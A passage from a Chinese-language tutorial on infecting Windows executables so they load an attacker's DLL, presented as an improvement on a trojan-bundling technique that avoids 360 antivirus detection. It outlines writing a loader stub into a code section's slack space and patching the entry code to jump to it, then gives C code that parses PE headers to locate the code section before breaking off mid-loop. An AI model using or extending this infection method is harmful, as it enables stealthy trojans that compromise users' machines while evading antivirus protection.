感染可执行文件加载Dll

 

       以前看过一篇文章《捆绑任意可执行文件做木马》深感作者对汇编运用之熟练。但经过实际练习感觉到办法还有些欠缺，比如说修改文件头AddressOfEntryPoint域的RVA这一招连360都盯上了。另外创建一个节来写入数据使程序变得臃肿。实际上每一个可执行文件的代码节都有很大的剩余空间没利用，我们只要在剩余空间里写入不到200个字节的Dll启动代码就行了。

本文假设读者已经具备了汇编语言pe结构体和使用msdn的能力

       本文的主要思路是：

找出目标文件剩余空间

将开始的代码修改为跳转指令跳转到指定的代码处

在剩余空间里写入启动代码

在剩余空间里写入被修改的代码和回跳代码

被感染后的文件执行流程如图一所示：

 

还是看看具体的实现代码吧：

void PrintInfo () { printf("使用时输入目标文件的文件名字（需要扩展名）/n"); printf("/n/n/n"); } TCHAR FileBuf[128]; printf("enter target file/n"); wscanf(L"%s",FileBuf );  

 

对一个pe文件修改最方便的还是用CreateFile（）CreateFileMapping（）之类的api函数来创建一个文件映像。这些就不多说了不懂的可以看msdn。

假设我们得到的文件映像基地址是pFileImage首先定位文件的代码段（这里需要用到pe文件的知识）

PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)pFileImage; PIMAGE_FILE_HEADER pFileHeader =(PIMAGE_FILE_HEADER)((byte *)pFileImage+pDosHeader->e_lfanew+4); PIMAGE_OPTIONAL_HEADER32 pOptionalHeader =(PIMAGE_OPTIONAL_HEADER32)((byte*)pFileImage+pDosHeader->e_lfanew+4+sizeof(IMAGE_FILE_HEADER)); PIMAGE_SECTION_HEADER pSecHeader = (PIMAGE_SECTION_HEADER)((char *)pOptionalHeader + sizeof(IMAGE_OPTIONAL_HEADER32 ) ); ///定位节头数组指针 DWORD SectionNums = pFileHeader->NumberOfSections ; DWORD i ; ///找到代码节 for ( i = 0;i < SectionNums ;i ++ ) { if ( pSecHea